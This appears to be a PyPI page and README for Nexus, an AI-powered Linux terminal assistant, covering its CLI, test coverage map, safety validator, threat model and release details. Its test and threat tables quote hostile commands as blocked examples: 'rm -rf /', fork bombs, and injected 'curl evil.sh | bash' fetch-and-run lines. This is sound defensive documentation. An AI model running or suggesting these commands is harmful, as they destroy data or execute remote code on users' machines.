If router and primary chat are the same client instance (e.g. Groq-only setups), applying both chat_model and router_model would fight over one .model; after chat_model is applied, router_model is skipped on that shared instance so the chat choice wins.
Model env vars are not read for chat_model / router_model / browser_model — only config.json (and what onboarding/settings write there).
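
The first two edge cases can be sketched as below. The catalog contents, the `Client` class, and `apply_saved_models` are placeholders invented for this example; the model IDs are deliberately fake.

```python
from dataclasses import dataclass
from typing import Dict, Set

# Placeholder catalog: task -> allowed model IDs (hypothetical values).
CATALOG: Dict[str, Set[str]] = {
    "chat": {"model-a", "model-b"},
    "router": {"model-r"},
}


@dataclass
class Client:
    model: str


def apply_saved_models(config: dict, chat_client: Client, router_client: Client) -> None:
    chat_applied = False
    chat_model = config.get("chat_model")
    if chat_model in CATALOG["chat"]:  # unknown IDs are silently ignored
        chat_client.model = chat_model
        chat_applied = True

    router_model = config.get("router_model")
    if router_model in CATALOG["router"]:
        if router_client is chat_client and chat_applied:
            return  # shared instance: the chat choice wins
        router_client.model = router_model
```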

CLI Commands

Chat

nexus chat "How do I check disk space?"

Package Management

nexus install htop
nexus remove firefox
nexus update

Natural Language Execution

nexus do "find all python files larger than 1MB"

Browser Automation

nexus browse "Find MrBeast on YouTube"
nexus browse --cloud "Download latest Chrome .deb"

Web Search

nexus search "best restaurants in Dubai"

Testing

Nexus ships with 198 automated pytest tests across 10+ test files, covering the critical code paths described in the coverage map below. Run them at any time:

# Install dev dependencies (first time only)
pip install -e ".[dev]"

# Run all tests
pytest

# Run with verbose output
pytest -v

# Run a single test file
pytest tests/test_executor.py -v

Test Coverage Map

`tests/test_security.py` — 32 tests

What it checks: The CommandValidator and SafetyCheck layer that sits before every command execution.

| Test Group | Checks |
| --- | --- |
| `TestCommandValidatorBlocked` | `rm -rf /` and fork bombs are hard-blocked and return `is_valid=False` |
| `TestCommandValidatorWarnings` | `curl ... \| sh` is allowed but raises a warning; `ls` has zero warnings |
| `TestCommandValidatorSyntax` | Mismatched quotes and unbalanced parentheses are caught as syntax errors |
| `TestSafetyCheckIntegration` | `SafetyCheck.check_command()` raises `SecurityViolation` on blocked commands, returns `True` on safe ones |
| `TestSudoDetection` | `apt`, `systemctl`, writing to `/etc/` are correctly flagged as requiring sudo; `chmod` on user paths is not forced interactive |
| `TestRmRfHeuristics` | `rm -rf /tmp/...` and similar are not misread as `rm -rf /`; newline after `/` does not false-positive |
| `TestPathWithinRoots` | File read/write allowlists use proper path subtrees (e.g. `/home/user2` is not under `/home/user`) |
| `TestFtpSecurity` | FTP passwords in URLs, `wget --ftp-password`, `lftp -u user,pass`, and anonymous FTP are rejected in strict mode |

Why it matters: This is the last line of defence against AI-hallucinated destructive commands. If this breaks, Nexus could execute rm -rf / without user confirmation.

`tests/test_audit_logger.py` — 8 tests

What it checks: The forensic audit log written to ~/.nexus/audit.log.

| Test Group | Checks |
| --- | --- |
| `TestAuditLogCreation` | Log file is created on construction; file permissions are `0o600` (owner-only read/write) |
| `TestAuditLogEntries` | Successful commands log `STATUS=OK`; failures log `STATUS=FAIL(rc)`; unconfirmed logs `CONFIRMED=NO(auto)`; stdout excerpts are included; skipped commands log `STATUS=SKIPPED`; multiple entries append correctly |

Why it matters: The audit log is the only persistent record of what Nexus ran on your machine. These tests check that (1) the log file is private, so other users on a shared machine can't read it, (2) every code path (success, failure, skip) leaves a trace, and (3) you can reconstruct what happened if something breaks.
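
For illustration, an append-only log with these properties could look like the sketch below. The status strings follow the test table; the line layout, the `CONFIRMED=YES` value, and the function name are assumptions.

```python
import os
import time
from pathlib import Path


def append_audit_entry(
    log_path: Path,
    command: str,
    returncode: int,
    confirmed: bool,
    skipped: bool = False,
) -> str:
    """Append one line to the audit log and keep the file owner-only."""
    if skipped:
        status = "SKIPPED"
    elif returncode == 0:
        status = "OK"
    else:
        status = f"FAIL({returncode})"
    confirmation = "YES" if confirmed else "NO(auto)"
    stamp = time.strftime("%Y-%m-%dT%H:%M:%S")
    line = f"{stamp} STATUS={status} CONFIRMED={confirmation} CMD={command!r}\n"

    log_path.parent.mkdir(parents=True, exist_ok=True)
    # O_APPEND keeps earlier entries; 0o600 applies when the file is created.
    fd = os.open(log_path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
    with os.fdopen(fd, "a") as handle:
        handle.write(line)
    os.chmod(log_path, 0o600)  # tighten the mode if the file already existed
    return line
```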

`tests/test_executor.py` — 18 tests

What it checks: The CommandExecutor — the central class that runs every shell command.

| Test Group | Checks |
| --- | --- |
| `TestExecutorSafeCommands` | `echo` returns RC=0 and correct stdout; `false` returns RC≠0; pipelines work |
| `TestExecutorBlockedCommands` | `rm -rf /` and fork bombs return RC=-1 without executing; blocked commands write SKIPPED to audit log |
| `TestExecutorDryRun` | Dry-run returns RC=0 without touching disk; `touch` doesn't create a file; audit log shows SKIPPED |
| `TestExecutorAuditIntegration` | Successful and failed executions both write entries to the audit log |
| `TestExecutorSudoPasswordClearing` | `bytearray` is zeroed on auth failure (`incorrect password` in stderr); password cache is never a plain `str` |
| `TestShellModeScoping` | Simple commands use `shell=False` + list args; commands with `\|` use `shell=True` + string |

Why it matters: The executor is the most security-critical component, because it is where commands actually run. The shell=True scoping test is particularly important: it verifies that a simple command such as ls /tmp runs with shell=False and list arguments, so it can't be silently turned into ls /tmp; curl evil.sh | bash through shell interpretation.
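
The scoping rule can be sketched with the standard library alone. The operator list matches the one given for the executor (&&, |, ;, >); the helper names and the plain substring check are simplifications for this example, and a real implementation would need to ignore operators that appear inside quoted arguments.

```python
import shlex
import subprocess
from typing import List, Tuple, Union

SHELL_OPERATORS = ("&&", "|", ";", ">")


def build_run_args(command: str) -> Tuple[Union[str, List[str]], bool]:
    """Return (args, use_shell) for subprocess.run."""
    if any(op in command for op in SHELL_OPERATORS):
        return command, True  # genuine pipeline: needs a shell
    return shlex.split(command), False  # simple call: no shell involved


def run(command: str) -> subprocess.CompletedProcess:
    args, use_shell = build_run_args(command)
    return subprocess.run(args, shell=use_shell, capture_output=True, text=True)
```

With `shell=False` and list arguments, the program receives its arguments directly, so no shell is present to interpret metacharacters.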

`tests/test_planner.py` — 12 tests

What it checks: The Planner class that converts natural language into structured TaskStep lists.

Test Group	Checks
`TestPlannerParsing`	Valid JSON produces correct `TaskStep` objects with right fields; multi-step plans parse all steps; IDs are sequential (1, 2, 3…); malformed JSON returns `[]`; markdown code fences (```json) are stripped before parsing
`TestPlannerFallback`	Fallback LLM client is tried when primary raises an exception; all clients failing returns `[]`; `time.sleep` is called with a delay ≥ 2.0s between attempts (exponential backoff)

Why it matters: If the Planner silently returns a broken plan (wrong step types, missing commands), the orchestrator will execute garbage. The markdown fence test caught a real bug — LLMs sometimes wrap JSON in code blocks that need stripping. The backoff test verifies that a 429 rate-limit doesn't cause all fallback clients to be hammered simultaneously.
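The parsing behaviour described above (strip markdown fences, number steps sequentially, return `[]` on malformed input) might look roughly like this. The `TaskStep` fields and the JSON keys `action` and `command` are assumptions for the sketch; the real class may carry different fields.

```python
import json
import re
from dataclasses import dataclass
from typing import List

FENCE = "`" * 3  # a markdown code fence, built here to keep this example readable

# Optional fence with an optional "json" language tag around the payload.
_FENCED = re.compile(
    r"^\s*" + re.escape(FENCE) + r"(?:json)?\s*(.*?)\s*" + re.escape(FENCE) + r"\s*$",
    re.DOTALL,
)


@dataclass
class TaskStep:
    id: int
    action: str   # e.g. CHECK, BROWSER, TERMINAL
    command: str


def parse_plan(raw: str) -> List[TaskStep]:
    """Turn an LLM reply into steps; any malformed reply yields an empty plan."""
    match = _FENCED.match(raw)
    text = match.group(1) if match else raw
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):
        return []
    steps = []
    for index, item in enumerate(data, start=1):
        if not isinstance(item, dict) or "action" not in item:
            return []  # refuse partially valid plans rather than run garbage
        steps.append(TaskStep(index, str(item["action"]), str(item.get("command", ""))))
    return steps
```

Rejecting the whole plan when a single step is malformed is a design choice made for this sketch; it matches the stated goal that a broken plan should never reach the orchestrator.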

`tests/test_decision_engine.py` — 13 tests

What it checks: The DecisionEngine — Nexus's "brain" that classifies user input into intents.

Test Group	Checks
`TestHeuristicFastPath`	`"update"`, `"install git"`, `"remove nginx"`, `"uninstall docker"` resolve without calling the LLM (asserts `generate_response` was never called); `"Install Vim"` works case-insensitively
`TestSlowPathLLM`	Ambiguous inputs like `"keep docker tidy"` fall through to the router LLM; the returned action from the LLM is used
`TestSessionContextAwareness`	When session manager returns recent context, `SHOW_CACHED` is returned immediately (no LLM call); when context is `None`, the engine falls through normally

Why it matters: The fast-path tests guarantee that common commands never waste an LLM API call, cutting classification latency from about 100 ms to under 1 ms. The slow-path tests ensure that ambiguous requests don't silently default to the wrong action. The session tests verify that Nexus correctly answers "what did you just do?" from memory rather than re-querying the AI.
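A heuristic fast path with an LLM fallback can be sketched like this. The action labels (`INSTALL`, `REMOVE`, `UPDATE`), the patterns, and the `classify` signature are hypothetical; the real `DecisionEngine` may use different intents and matching rules.

```python
import re

# (pattern, action) pairs checked before any LLM call is made.
_FAST_PATTERNS = [
    (re.compile(r"^install\s+(\S+)$", re.IGNORECASE), "INSTALL"),
    (re.compile(r"^(?:remove|uninstall)\s+(\S+)$", re.IGNORECASE), "REMOVE"),
    (re.compile(r"^update$", re.IGNORECASE), "UPDATE"),
]


def classify(text, llm_route):
    """Return (action, target). llm_route is only called on a heuristic miss."""
    stripped = text.strip()
    for pattern, action in _FAST_PATTERNS:
        match = pattern.match(stripped)
        if match:
            # Patterns without a capture group (e.g. "update") have no target.
            target = match.group(1).lower() if match.groups() else None
            return action, target
    # Slow path: defer to the router model for anything ambiguous.
    return llm_route(stripped), None
```

Passing the router in as a callable makes it easy to assert in a test that it was never invoked for inputs such as `"install git"`.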

`tests/test_config_manager.py` — 13 tests

What it checks: Config persistence, environment variable overrides, corrupted file recovery, and file permissions.

`tests/test_model_catalog.py` — 6 tests

What it checks: Shared onboarding/settings catalog (key_flags_from_onboarding, choices_for_task, resolve_provider_for_model), apply_stored_task_models (primary brain switch, unknown model skipped, shared chat/router client behavior).

`tests/test_session_manager.py` — 29 tests

What it checks: Turn tracking, history trimming, context reference detection (pronouns, temporal markers), semantic relatedness filtering to prevent false-positive cache hits, and session summary generation.

`tests/test_command_generator.py` — 16 tests

What it checks: LLM response cleanup (markdown fences, backticks, whitespace), SafetyCheck validation on generated commands, memory integration (RAG query + feedback storage), and fallback / retry behavior (429-style errors, empty responses, deduped clients).

`tests/test_llm_client.py` — 11 tests

What it checks: Base LLMClient prompt enrichment (memory prepend, skip, double-enrichment guard, exception handling), MockLLMClient fallback, and search() raising NotImplementedError.

`tests/test_package_manager.py` — 22 tests

What it checks: Package name validation (rejects shell injection via ;, |, `, $()), correct install/remove/update commands for APT/DNF/Pacman, and graceful handling of unknown package managers.
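Package-name validation of this kind is usually an allowlist rather than a blocklist. The sketch below assumes a conservative character set and commonly used non-interactive install flags; the exact pattern and command lines in `package_manager.py` are not shown in this README, so treat both as assumptions.

```python
import re

# Allowlist: must start with an alphanumeric, then letters, digits, "+", ".", "_", "-".
# Anything else (";", "|", backticks, "$(", spaces, a leading "-") is rejected.
_VALID_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9+._-]*")

# Assumed install prefixes for the three supported managers.
_INSTALL_PREFIX = {
    "apt": ["sudo", "apt-get", "install", "-y"],
    "dnf": ["sudo", "dnf", "install", "-y"],
    "pacman": ["sudo", "pacman", "-S", "--noconfirm"],
}


def is_valid_package_name(name: str) -> bool:
    """True only if the whole name matches the allowlist."""
    return bool(_VALID_NAME.fullmatch(name))


def install_command(manager: str, package: str) -> list:
    """Build an argv list; raise ValueError on bad names or unknown managers."""
    if not is_valid_package_name(package):
        raise ValueError(f"invalid package name: {package!r}")
    if manager not in _INSTALL_PREFIX:
        raise ValueError(f"unsupported package manager: {manager!r}")
    return [*_INSTALL_PREFIX[manager], package]
```

Returning an argv list instead of a string means the validated name is passed to the package manager as a single argument, so it never passes through shell parsing.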

`tests/test_orchestrator.py` — 24 tests

What it checks: Missing-binary extraction (4 regex patterns), the self-healer (_PKG_ALIAS mapping, injection protection, LLM fallback, UNFIXABLE handling), plan view rendering, execute_plan (empty plan, user cancellation, terminal step execution), and the Azure AZURE_RUN helpers (_azure_bootstrap_command_line base64 round-trip for any shell line; _azure_run_preflight rejecting empty commands and bare git/curl/… stubs).
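The base64 round-trip mentioned for the Azure bootstrap helper addresses a quoting problem: an arbitrary shell line, with its own quotes and operators, has to survive being embedded in another command. A minimal sketch of the idea follows; `bootstrap_command_line` and `decode_bootstrap` are hypothetical stand-ins, and the real `_azure_bootstrap_command_line` may produce a different wrapper.

```python
import base64
import shlex


def bootstrap_command_line(shell_line: str) -> str:
    """Wrap any shell line so that it needs no further quoting."""
    encoded = base64.b64encode(shell_line.encode("utf-8")).decode("ascii")
    # The standard base64 alphabet (A-Z, a-z, 0-9, "+", "/", "=") contains
    # no quotes, spaces, or shell operators.
    return f"echo {encoded} | base64 -d | bash"


def decode_bootstrap(command_line: str) -> str:
    """Recover the original line from the wrapper (used for the round-trip check)."""
    encoded = shlex.split(command_line)[1]
    return base64.b64decode(encoded).decode("utf-8")
```

A round-trip test then only needs to assert that `decode_bootstrap(bootstrap_command_line(line)) == line` for lines containing quotes, pipes, and variable expansions.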

CI / Continuous Integration

Tests run automatically on every push via GitHub Actions (.github/workflows/ci.yml):

Python 3.10, 3.11, 3.12 (matrix build)
[dev] and [all,dev] extras tested in CI
Lint job: ruff check, ruff format --check, pip-audit --strict
Branches: main, mvp

Advanced Features

Memory System

Nexus remembers:

System Context: OS, package manager
Command Feedback: Success/failure of past commands
Proven Plans: Multi-step tasks that worked
User Preferences: Learned from interactions

Multi-Step Task Planning

Example: "Install Postman"

CHECK: which postman (idempotency)
BROWSER: Download from official site
TERMINAL: Extract and install

Self-Healing & Fallback Execution

Nexus is built to gracefully handle failures at both the software and API level:

Auto-Failover LLM Routing with Backoff: If the primary AI model hits a rate limit (429) during planning, Nexus waits 2^n + jitter seconds (exponential backoff) before routing to the next fallback model (e.g., OpenRouter → Groq → Gemini) — prevents cascade failures under burst load.
3-Attempt AI Self-Healer: If a terminal command fails, Nexus suspends the Live UI, passes stderr/stdout to reflect_and_fix (LLM acting as Senior DevOps Engineer), retries the healed command, and on continued failure feeds the error from each attempt back to the AI with accumulated context for deeper diagnosis. If the AI returns UNFIXABLE, the plan halts cleanly.
SERVICE_MGT Action: A dedicated step type for service management (systemctl start/restart) that automatically runs systemctl is-active after execution to confirm the service is actually up before marking the step as success.
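The failover-with-backoff behaviour in the first item above can be sketched as follows. The delay formula follows the stated 2^n + jitter rule; the function names, the jitter range of up to one second, and modelling each client as a plain callable are assumptions made for the example.

```python
import random
import time


def backoff_delay(attempt: int, rng=random.random) -> float:
    """Seconds to wait before fallback number `attempt` (1-based): 2^n plus jitter."""
    return 2 ** attempt + rng()  # rng() is in [0, 1)


def call_with_fallback(clients, prompt, sleep=time.sleep):
    """Try each client in order; return the first reply, or None if all fail."""
    for index, client in enumerate(clients):
        if index > 0:
            # Wait before moving on, so a burst of 429s does not hit every
            # fallback provider at the same moment.
            sleep(backoff_delay(index))
        try:
            return client(prompt)
        except Exception:
            # A sketch-level catch-all; real code would likely distinguish
            # rate limits and timeouts from programming errors.
            continue
    return None
```

Injecting `sleep` keeps tests fast: a test can pass `delays.append` and assert that the first recorded delay is at least 2.0 seconds, which is the same property `TestPlannerFallback` is described as checking.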

Smart Download Tracking

Monitors ~/Downloads for new files
Filters out .crdownload, .part, .tmp
Injects filenames into subsequent commands
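One simple way to implement the three steps above is to snapshot the directory before a browser step and diff it afterwards. This sketch assumes a polling approach and hypothetical function names; Nexus may instead use a filesystem watcher.

```python
from pathlib import Path

# In-progress download suffixes named in the list above.
PARTIAL_SUFFIXES = {".crdownload", ".part", ".tmp"}


def snapshot(directory: Path) -> set:
    """Names of the regular files currently in the directory."""
    return {entry.name for entry in directory.iterdir() if entry.is_file()}


def new_downloads(directory: Path, before: set) -> list:
    """Completed files that appeared since `before` was taken, sorted by name."""
    appeared = snapshot(directory) - before
    return sorted(
        name for name in appeared
        if Path(name).suffix.lower() not in PARTIAL_SUFFIXES
    )
```

The returned names can then be substituted into the next step's command, for example as the archive path handed to an extraction command.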

Security

Threat Model — What Nexus Defends Against

Attack Surface	Threat	Defence
LLM-generated commands	AI hallucinates a destructive command (`rm -rf /`)	AST parser + blacklist hard-blocks it before any execution
Shell injection	Crafted input turns a simple command into `cmd; curl evil.sh \| bash`	`shell=True` only enabled when genuine pipeline operators detected; otherwise `shlex.split()` list is used
Sudo privilege abuse	Cached password reused across untrusted commands	Password stored as `bytearray`, zeroed byte-by-byte on auth failure; never a plain Python string
Unseen command execution	Agent runs commands user never approved	Mandatory user confirmation gate on every execution; every decision logged to `~/.nexus/audit.log`
Audit evasion	Attacker covers tracks by deleting session data	Audit log is separate from session (`audit.log` vs `session.json`), `chmod 600`, append-only via Python logging
API key leakage	Keys logged in debug output or stack traces	No debug prints in production paths; keys read from env/config, never echoed
Path escape on file read/write	LLM points `FILE_READ` or CLI `read` at another user’s home via prefix tricks	`Path.resolve()` + `relative_to` allowlist (home + cwd), not `str.startswith` on `/home/user`
FTP secrets on CLI	Model suggests `ftp://user:pass@…` or `wget --ftp-password=`	Regex warnings in `CommandValidator`; strict validation blocks before execution
Indefinite hangs	Malformed command hangs the subprocess forever	Configurable timeout (default 120s) on all `subprocess.run` calls
Cascading API failures	All LLM fallbacks slammed simultaneously on rate-limit	Exponential backoff with jitter between fallback attempts
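The path-escape row in the table above contrasts a subtree check with a string-prefix check. A minimal sketch of the subtree approach, using only `pathlib`, is shown here; `is_path_allowed` is a hypothetical name and the allowlist contents (home and cwd in Nexus) are supplied by the caller.

```python
from pathlib import Path


def is_path_allowed(candidate, allowed_roots) -> bool:
    """True if candidate resolves to a location inside one of the allowed roots."""
    # resolve() collapses ".." segments and follows symlinks before comparing.
    resolved = Path(candidate).expanduser().resolve()
    for root in allowed_roots:
        try:
            resolved.relative_to(Path(root).resolve())
        except ValueError:
            continue  # not inside this root, try the next one
        return True
    return False
```

The difference from `str.startswith` shows up with sibling directories: `/home/user2/secret.txt` starts with the string `/home/user`, but it is not inside the `/home/user` subtree, so `relative_to` raises `ValueError` and the path is rejected.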

Remaining Attack Surface / Known Limitations

shell=True is still used for commands with pipeline operators — a sophisticated injected payload containing | could still bypass isolation. Mitigation: the AST validator and user confirmation gate remain the last line of defence.
sudo password is zeroed on auth failure, but a core dump between prompt and clear could expose it in memory. Mitigation: use a dedicated sudo session token (planned, P3).
Session file (~/.nexus/session.json) is unencrypted. On multi-user machines, ensure proper home directory permissions (700).
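For the sudo limitation above, the zero-on-failure pattern can be illustrated with a small cache class. This is a sketch under assumptions: the class and method names are hypothetical, and, as the limitation itself notes, zeroing a `bytearray` is best-effort because other copies of the secret may still exist in process memory.

```python
from typing import Optional


def zero_secret(buffer: bytearray) -> None:
    """Overwrite every byte in place; the same object is mutated, not replaced."""
    for index in range(len(buffer)):
        buffer[index] = 0


class SudoPasswordCache:
    """Holds the password as a mutable bytearray, never as an immutable str."""

    def __init__(self) -> None:
        self._buf: Optional[bytearray] = None

    def store(self, password: bytes) -> None:
        self.clear()
        self._buf = bytearray(password)

    def get(self) -> Optional[bytearray]:
        return self._buf

    def clear(self) -> None:
        if self._buf is not None:
            zero_secret(self._buf)
            self._buf = None

    def on_auth_result(self, stderr: str) -> None:
        # Wipe the cache as soon as sudo reports a bad password.
        if "incorrect password" in stderr.lower():
            self.clear()
```

A `str` cannot be wiped this way because Python strings are immutable, which is why the tests insist the cache is never a plain `str`.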

Configuration

# Enable dry-run (no commands ever executed)
export JARVIS_DRY_RUN=1

# Audit log location
~/.nexus/audit.log

# Session history location
~/.nexus/session.json

Project Structure

nexus/
├── src/jarvis/
│   ├── ai/                      # AI clients and intelligence
│   │   ├── llm_client.py        # Model abstractions + prompt enrichment
│   │   ├── command_generator.py  # NL → shell with SafetyCheck
│   │   ├── decision_engine.py   # Fast heuristic + slow LLM routing
│   │   └── memory_client.py     # Supermemory RAG integration
│   ├── core/                    # Core systems
│   │   ├── orchestrator.py      # Multi-step execution + self-healing
│   │   ├── executor.py          # Command execution + audit + secure sudo
│   │   ├── audit_logger.py      # Tamper-evident command log (chmod 600)
│   │   ├── session_manager.py   # In-memory session state
│   │   ├── persistent_session_manager.py  # Disk-persisted sessions
│   │   ├── config_manager.py    # API keys + preferences (chmod 600)
│   │   ├── model_catalog.py    # Task ↔ model catalog; apply saved defaults at startup
│   │   ├── api_key_rotator.py   # Google API key rotation
│   │   ├── system_detector.py
│   │   └── security.py          # AST validation + pattern blacklist
│   ├── modules/                 # Feature modules
│   │   ├── browser_manager.py   # browser-use + API key rotation
│   │   └── package_manager.py   # apt/dnf/pacman with name validation
│   ├── ui/                      # User interfaces
│   │   ├── console_app.py       # Rich TUI with slash commands
│   │   └── onboarding.py
│   ├── utils/
│   │   └── syntax_output.py     # Rich syntax highlighting for file reads
│   └── main.py                  # CLI entry point (Typer)
├── tests/                       # 198+ pytest tests
├── docs/
│   ├── FUTURE_SCOPE.md          # Roadmap + shipped features
│   ├── architecture_overview.md # Architecture deep-dive with Mermaid diagrams
│   ├── model_usage_guide.md     # Which AI model is used where
│   ├── API_KEY_ROTATION_GUIDE.md
│   ├── GROQ_GPT_FALLBACK.md
│   └── MEMORY_PERSISTENCE_GUIDE.md
├── .github/workflows/ci.yml    # CI: tests + lint + security scan
├── pyproject.toml
└── README.md

Environment Variables

Variable	Purpose	Required
`GOOGLE_API_KEY`	Gemini models, search	For search feature
`OPENROUTER_API_KEY`	GPT models via OpenRouter	For best chat quality
`GROQ_API_KEY`	Fast routing decisions	Optional (fallback to others)
`SUPERMEMORY_API_KEY`	Memory/RAG (your Supermemory project; BYOK)	Optional
`BROWSER_USE_API_KEY`	Cloud browser automation	Optional

Roadmap

See docs/FUTURE_SCOPE.md for the full roadmap.

Shipped: Multi-brain AI architecture, Supermemory RAG (BYOK onboarding + env), browser automation with key rotation, self-healing execution (improved missing-path heuristics, shared FILE_WRITE helpers), exponential backoff (planner) + command-generator retries/fallbacks (memory recorded on the succeeding LLM client), SERVICE_MGT, DIRECT_EXECUTE, /settings + onboarding default models (shared model_catalog), planner system-ops knowledge (AppImage w/ mktemp extract, deb, rpm, desktop entries), path allowlists for read/write, FTP strict checks, persistent sessions, audit logging, secure sudo, shell injection hardening, 198-test suite, CI with linting and security scanning.

Up next: Rollback checkpoints, dynamic slash command registry, FILE_APPEND / FILE_PATCH, LLM rate limiting & budgets, context window management, parallel step execution.

Long-term: MCP integration, Git assistant, Docker management mode, natural language cron jobs, interactive desktop avatar.

Releasing (maintainers)

Bump version in pyproject.toml if needed.
Create and push an annotated tag: git tag -a v0.1.0 -m "v0.1.0" && git push origin v0.1.0.
The .github/workflows/release.yml workflow builds sdist + wheel, uploads them to the GitHub Release, then publishes to PyPI via trusted publishing (OIDC).

One-time PyPI setup: On pypi.org, create the project nexus-linux-assistant, then add a trusted publisher for this GitHub repo (Garvit1000/nexus) and workflow release.yml (see the PyPI trusted publishing docs). No PYPI_TOKEN secret is required when OIDC is configured.

Build only from CI or a clean tree so .env is never included in artifacts.

Contributing

Contributions are welcome! This project is actively developed.

License

[Add your license here]

Author

Created by Garvit (garvitjoshi543@gmail.com)

Nexus - Your intelligent Linux companion, powered by multiple AI brains working in harmony.

Release history

0.1.2 (Apr 5, 2026)
0.1.1 (Mar 29, 2026)
0.1.0 (Mar 26, 2026, this version)

Download files

Source Distribution

nexus_linux_assistant-0.1.0.tar.gz (138.7 kB)

Uploaded Mar 26, 2026 Source

Built Distribution

nexus_linux_assistant-0.1.0-py3-none-any.whl (99.6 kB)

Uploaded Mar 26, 2026 Python 3

File details

Details for the file nexus_linux_assistant-0.1.0.tar.gz.

File metadata

Download URL: nexus_linux_assistant-0.1.0.tar.gz
Upload date: Mar 26, 2026
Size: 138.7 kB
Tags: Source
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for nexus_linux_assistant-0.1.0.tar.gz
Algorithm	Hash digest
SHA256	`da06b3ed9393ca10787f722ed90a96a3e49e042c741a4e28456383a8a4be1718`
MD5	`df1f90c7b1d9ca5f086b825733fd1774`
BLAKE2b-256	`cc54c4041b7e04376fde34ed1bf9ceeef98363e315cbc584bbf7a009cdb0f551`

Provenance

The following attestation bundles were made for nexus_linux_assistant-0.1.0.tar.gz:

Publisher: release.yml on Garvit1000/nexus

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: nexus_linux_assistant-0.1.0.tar.gz
- Subject digest: da06b3ed9393ca10787f722ed90a96a3e49e042c741a4e28456383a8a4be1718
- Sigstore transparency entry: 1186194753
- Sigstore integration time: Mar 26, 2026
Source repository:
- Permalink: Garvit1000/nexus@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Branch / Tag: refs/tags/v0.1.0
- Owner: https://github.com/Garvit1000
- Access: private
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Trigger Event: push

File details

Details for the file nexus_linux_assistant-0.1.0-py3-none-any.whl.

File metadata

Download URL: nexus_linux_assistant-0.1.0-py3-none-any.whl
Upload date: Mar 26, 2026
Size: 99.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for nexus_linux_assistant-0.1.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`9b06c674e9d6e6d5536d25c64d0a4e9dc750c200bb4ae94c0bf9352abd35a68e`
MD5	`c47d3bebede8e74fc89f8a2fac142bf2`
BLAKE2b-256	`4f3aa464a5562e2a6ceff98852d12e316ec52c02cfded6d855bbd509648d5149`

Provenance

The following attestation bundles were made for nexus_linux_assistant-0.1.0-py3-none-any.whl:

Publisher: release.yml on Garvit1000/nexus

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: nexus_linux_assistant-0.1.0-py3-none-any.whl
- Subject digest: 9b06c674e9d6e6d5536d25c64d0a4e9dc750c200bb4ae94c0bf9352abd35a68e
- Sigstore transparency entry: 1186194757
- Sigstore integration time: Mar 26, 2026
Source repository:
- Permalink: Garvit1000/nexus@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Branch / Tag: refs/tags/v0.1.0
- Owner: https://github.com/Garvit1000
- Access: private
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Trigger Event: push
